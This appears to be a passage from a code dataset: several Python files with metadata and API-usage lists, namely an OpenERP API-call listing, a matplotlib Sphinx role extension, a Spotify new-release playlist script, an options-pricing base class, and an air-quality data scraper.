"openerp.osv.fields.char", "line_number": 562, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 562, "usage_type": "name" }, { "api_name": "openerp.osv.fields.integer", "line_number": 563, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 563, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 564, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 564, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 567, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 567, "usage_type": "name" }, { "api_name": "openerp.osv.fields.boolean", "line_number": 571, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 571, "usage_type": "name" }, { "api_name": "openerp.osv.fields.integer", "line_number": 572, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 572, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 573, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 573, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 586, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 586, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 589, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 589, "usage_type": "name" }, { "api_name": "openerp.osv.fields.integer", "line_number": 590, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 590, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 623, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 623, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 623, "usage_type": "call" }, { "api_name": "re.compile", "line_number": 633, "usage_type": "call" }, { "api_name": "re.match", "line_number": 634, "usage_type": "call" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 637, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 637, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 637, "usage_type": "call" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 645, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 645, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 645, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 663, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 663, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 708, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 708, "usage_type": "name" }, { "api_name": "openerp.osv.fields.function", "line_number": 709, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 709, "usage_type": "name" }, { "api_name": "openerp.osv.fields.function", "line_number": 711, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 711, "usage_type": "name" }, { "api_name": "openerp.osv.fields.selection", "line_number": 713, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 713, "usage_type": "name" }, { "api_name": "openerp.osv.fields.function", "line_number": 716, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 716, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 718, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 718, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 720, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 720, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 722, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 722, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 724, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 724, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 726, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 726, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 728, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 728, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 784, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 784, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 784, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 805, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 805, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 810, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 810, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 811, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 811, "usage_type": "name" }, { "api_name": "openerp.osv.fields.integer", "line_number": 812, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 812, "usage_type": "name" }, { "api_name": "openerp.osv.fields.integer", "line_number": 813, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 813, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 819, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 819, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 819, "usage_type": "call" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 826, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 826, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 826, "usage_type": "call" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 868, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 868, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 868, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 886, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 886, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 891, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 891, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 892, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 892, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 893, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 893, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 916, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 916, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 916, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 927, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 927, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 979, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 979, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 980, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 980, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 981, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 981, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 982, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 982, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 983, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 983, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 984, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 984, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 985, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 985, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 986, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 986, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 987, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 987, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 988, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 988, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 989, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 989, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 990, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 990, "usage_type": "name" }, { "api_name": "openerp.osv.osv.except_osv", "line_number": 1016, "usage_type": "call" }, { "api_name": "openerp.osv.osv", "line_number": 1016, "usage_type": "name" }, { "api_name": "openerp.tools.translate._", "line_number": 1016, "usage_type": "call" }, { "api_name": "openerp.osv.osv.Model", "line_number": 1026, "usage_type": "attribute" }, { "api_name": "openerp.osv.osv", "line_number": 1026, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 1031, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 1031, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 1032, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 1032, "usage_type": "name" }, { "api_name": "openerp.osv.fields.many2one", "line_number": 1033, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 1033, "usage_type": "name" }, { "api_name": "openerp.osv.fields.char", "line_number": 1034, "usage_type": "call" }, { "api_name": "openerp.osv.fields", "line_number": 1034, "usage_type": "name" } ]
166803375
from docutils import nodes from os.path import sep def rcparam_role(name, rawtext, text, lineno, inliner, options={}, content=[]): rendered = nodes.Text('rcParams["{}"]'.format(text)) source = inliner.document.attributes['source'].replace(sep, '/') rel_source = source.split('/doc/', 1)[1] levels = rel_source.count('/') refuri = ('../' * levels + 'tutorials/introductory/customizing.html#matplotlib-rcparams') ref = nodes.reference(rawtext, rendered, refuri=refuri) return [nodes.literal('', '', ref)], [] def setup(app): app.add_role("rc", rcparam_role) return {"parallel_read_safe": True, "parallel_write_safe": True}
null
extraPackages/matplotlib-3.0.2/doc/sphinxext/custom_roles.py
custom_roles.py
py
678
python
en
code
null
code-starcoder2
83
[ { "api_name": "docutils.nodes.Text", "line_number": 6, "usage_type": "call" }, { "api_name": "docutils.nodes", "line_number": 6, "usage_type": "name" }, { "api_name": "os.path.sep", "line_number": 8, "usage_type": "argument" }, { "api_name": "docutils.nodes.reference", "line_number": 15, "usage_type": "call" }, { "api_name": "docutils.nodes", "line_number": 15, "usage_type": "name" }, { "api_name": "docutils.nodes.literal", "line_number": 16, "usage_type": "call" }, { "api_name": "docutils.nodes", "line_number": 16, "usage_type": "name" } ]
456176711
#Author : Isanur Sardar import requests import csv st_code = input('Write the station code with inverted comma') url = 'http://emis.wbpcb.gov.in/airquality/JSP/aq/fetch_val_ajax.jsp' myobj = {'stn_code': st_code, 'type': 'date'} x = requests.post(url, data = myobj) da = eval(x.text) main = [] def boxx(x): ix = int(x) if (x - ix) > 0.5: ix = ix +1 else: pass return ix f_name = 'wbpcb-data-IS'+st_code+'.csv' fxx = open(f_name, 'w', newline='') writer = csv.writer(fxx) writer.writerow(["DATE", "NO2","NO2-SI", "PM10","PM10-SI","SO2","SO2-SI"]) dates = da['list'] n = 0 for el in dates: date = el['dates'] date_el = date.split("/") day = date_el[1] month = date_el[0] year = date_el[2] if eval(year) < 2010 or eval(year) > 2021 : pass else: try: d = day + '/'+ month +'/' + year data = { 'stn_code': st_code, 'date': d, 'type': 'aqi'} #print(data) res = requests.post(url, data = data) rest = eval(res.text) #print(rest) NO2 = rest['list'][0]['value'] vno2 = eval(NO2) if (vno2<=40): no2si=vno2*50/40 elif (vno2>40 and vno2<=80): no2si=50+(vno2-40)*50/40 elif (vno2>80 and vno2<=180): no2si=100+(vno2-80)*100/100 elif (vno2>180 and vno2<=280): no2si=200+(vno2-180)*100/100 elif (vno2>280 and vno2<=400): no2si=300+(vno2-280)*100/120 else: no2si=400+(vno2-400)*100/120 PM10 = rest['list'][1]['value'] vpm10 = eval(PM10) if vpm10<=100: pm10si=vpm10 elif vpm10>100 and vpm10<=250: pm10si=100+(vpm10-100)*100/150 elif vpm10>250 and vpm10<=350: pm10si=200+(vpm10-250) elif vpm10>350 and vpm10<=430: pm10si=300+(vpm10-350)*100/80 else: pm10si=400+(vpm10-430)*100/80 SO2 = rest['list'][2]['value'] vso2 = eval(SO2) if (vso2<=40): so2si=vso2*50/40 elif (vso2>40 and vso2<=80): so2si=50+(vso2-40)*50/40 elif (vso2>80 and vso2<=380): so2si=100+(vso2-80)*100/300 elif (vso2>380 and vso2<=800): so2si=200+(vso2-380)*100/420 elif (vso2>800 and vso2<=1600): so2si=300+(vso2-800)*100/800 else: so2si=400+(vso2-1600)*100/800 texxt = [d, NO2,boxx(no2si), PM10,boxx(pm10si) ,SO2, boxx(so2si)] main.append(texxt) #try: writer.writerow(texxt) #print('ok') #except: # print("Unexpected error:", sys.exc_info()[0]) except: pass n = n +1 print(n)
null
Air-Quality_Data_Crunching/main.py
main.py
py
2,569
python
en
code
null
code-starcoder2
83
[ { "api_name": "requests.post", "line_number": 11, "usage_type": "call" }, { "api_name": "csv.writer", "line_number": 24, "usage_type": "call" }, { "api_name": "requests.post", "line_number": 43, "usage_type": "call" } ]
174160712
# shows a user's playlists (need to be authenticated via oauth) import pprint import sys import os import subprocess import datetime import time import spotipy import spotipy.util as util #from requests.exceptions import ConnectionError username = "ADD YOUR USERNAME HERE" FreshNewShit = "ADD ID OF YOUR PLAYLIST HERE" THRESHOLD = 7 #Get Tracks of THRESHOLD last days if len(sys.argv) > 1:THRESHOLD = sys.argv[1] def isNew(date): split = date.split("-") if len(split)==3: release=datetime.datetime(int(split[0]),int(split[1]),int(split[2])) tday = datetime.datetime.now().day tmonth = datetime.datetime.now().month tyear = datetime.datetime.now().year today = datetime.datetime(tyear, tmonth, tday) diff = abs((release - today).days) if diff<=THRESHOLD: return True return False def addAlbum(id,sp,tracksToAdd): albumtracks = tryOnce(lambda: sp.album_tracks(id))['items'] for track in albumtracks: addTrack(track,sp,tracksToAdd) def addPartly(id,sp,tracksToAdd,artists): for track in tryOnce(lambda: sp.album_tracks(id))['items']: for a in track['artists']: if a['id'] in artists: addTrack(track,sp,tracksToAdd) def addTrack(track,sp,tracksToAdd): name = track['name'] if track['id'] not in tracksToAdd and 'Instrumental' not in name: try: tracksToAdd.append(track['id']) except Exception as e: print(e) def replaceFreshNewShit(): if token: sp = spotipy.Spotify(auth=token) pp = pprint.PrettyPrinter(indent=4) # Get all followed Artists print("get Artists") after = None artists = [] while(True): followed_artists = sp.current_user_followed_artists(limit=50,after=after)['artists']['items'] if(len(followed_artists)==0):break for x in followed_artists: #pp.pprint(x) artists.append(x['id']) after = x['id'] print("Artists:",len(artists)) #Get all relevant albums print("get Albums") album_list=[] for artist in artists: offset=0 while(True): albums = tryOnce( lambda: sp.artist_albums(artist,limit=50,offset=offset)['items'] ) if(len(albums)==0):break for x in albums: #print(x['release_date'],x['name']) if(isNew(x['release_date'])and x not in album_list): album_list.append(x) #pp.pprint(x) offset += 50 print("Albums",len(album_list)) #Add Tracks print("add Tracks") tracksToAdd = [] singles = [] albums = [] appears_on = [] for album in album_list: #add albums and singles if album['album_group']=='album' :albums.append(album['id']) if album['album_group']=='single':singles.append(album['id']) else:appears_on.append(album['id']) print("singles",len(singles),"albums",len(album),"appears_on",len(appears_on)) for x in singles:addAlbum(x,sp,tracksToAdd) for x in appears_on:addPartly(x,sp,tracksToAdd,artists) for x in albums:addAlbum(x,sp,tracksToAdd) tryOnce(lambda: sp.user_playlist_replace_tracks(username,FreshNewShit,tracksToAdd)) else: print("Can't get token for", username) def tryOnce(fun): try: return fun() except Exception as e: print("trying again in 3 sec ",e) time.sleep(3) tryOnce(fun) scope='user-follow-read playlist-modify-public playlist-read-collaborative playlist-modify-private playlist-read-private ' token = util.prompt_for_user_token(username,scope) replaceFreshNewShit()
null
newSongs.py
newSongs.py
py
3,914
python
en
code
null
code-starcoder2
83
[ { "api_name": "sys.argv", "line_number": 17, "usage_type": "attribute" }, { "api_name": "datetime.datetime", "line_number": 22, "usage_type": "call" }, { "api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute" }, { "api_name": "datetime.datetime.now", "line_number": 25, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 25, "usage_type": "attribute" }, { "api_name": "datetime.datetime.now", "line_number": 26, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute" }, { "api_name": "datetime.datetime", "line_number": 27, "usage_type": "call" }, { "api_name": "spotipy.Spotify", "line_number": 55, "usage_type": "call" }, { "api_name": "pprint.PrettyPrinter", "line_number": 56, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 113, "usage_type": "call" }, { "api_name": "spotipy.util.prompt_for_user_token", "line_number": 120, "usage_type": "call" }, { "api_name": "spotipy.util", "line_number": 120, "usage_type": "name" } ]
514509955
from enum import Enum from abc import ABC from abc import abstractclassmethod import numpy as np class OPTION_TYPE(Enum): CALL_OPTION = 'call' PUT_OPTION = 'put' class OptionPricingModel(ABC): """Abstract class defining interface for option pricing models.""" def price(self, option_type, *args, **kwargs): """Calculates call/put option price according to the specified parameter.""" if option_type == OPTION_TYPE.CALL_OPTION.value: return self._calculate_call_option_price(*args, **kwargs) elif option_type == OPTION_TYPE.PUT_OPTION.value: return self._calculate_put_option_price(*args, **kwargs) else: raise Exception("Wrong option type") @abstractclassmethod def _calculate_call_option_price(self, S, K, T, r, sigma): """Calculates option price for call option.""" raise NotImplementedError() def _calculate_put_option_price(self, S, K, T, r, sigma): """ Calculates option price for put option. Put option price is calculated from call price based on the Put-Call property. https://www.investopedia.com/terms/p/putcallparity.asp Formula: C + PV(x) = P + S ============================= C price of the European call option PV(x) the present value of the strike price (x), P price of the European put S spot price or the current market value of the underlying asset """ c = self._calculate_call_option_price(S, K, T, r, sigma) pv_strike = np.exp(-r * T) * K put_price = c + pv_strike - S return put_price
null
options/models/base.py
base.py
py
1,688
python
en
code
null
code-starcoder2
83
[ { "api_name": "enum.Enum", "line_number": 8, "usage_type": "name" }, { "api_name": "abc.ABC", "line_number": 13, "usage_type": "name" }, { "api_name": "abc.abstractclassmethod", "line_number": 25, "usage_type": "name" }, { "api_name": "numpy.exp", "line_number": 45, "usage_type": "call" } ]